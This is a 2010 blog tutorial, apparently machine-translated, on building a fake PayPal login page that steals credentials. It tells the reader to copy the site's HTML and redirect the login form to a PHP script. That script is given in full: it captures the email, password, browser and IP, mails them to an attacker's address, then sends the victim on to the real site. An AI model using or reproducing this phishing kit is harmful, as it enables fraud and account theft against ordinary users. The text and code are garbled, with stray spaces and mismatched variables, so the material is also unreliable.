Tuesday, August 17, 2010

How TO Create a Fake Scam Page

Hi, lately I'm tired of seeing the various forums:

Give me some scam to Bank/s.

So I decided to write this tutorial. In it you'll learn how you can make your own scam to the desired site.

WARNING: The advance will not take me to look at it and discovered that the Earth is only for those who do not know.

OK, so first we choose a target.

We chose www.paypal.com.

Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on your computer.

We open ... There might be a problem, namely the way the image.

If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)

Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).

You have a code like <form action="login2.php">. Login2.php change in 040147.php!

Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.
Good memory.
The password, the code should be similar (). So, password is held in variable password. A and memorize it.

Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:

$ To = "upgoingstar@gmail.com"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;

mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");


Modify code

$ To = "upgoingstar@gmail.com"

and put your mail. The code above variables over email and password and sends them together with some more useful details.

Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:

For Further Reading,
Dangerous Hacking, Internet Tweaks, Tutorials


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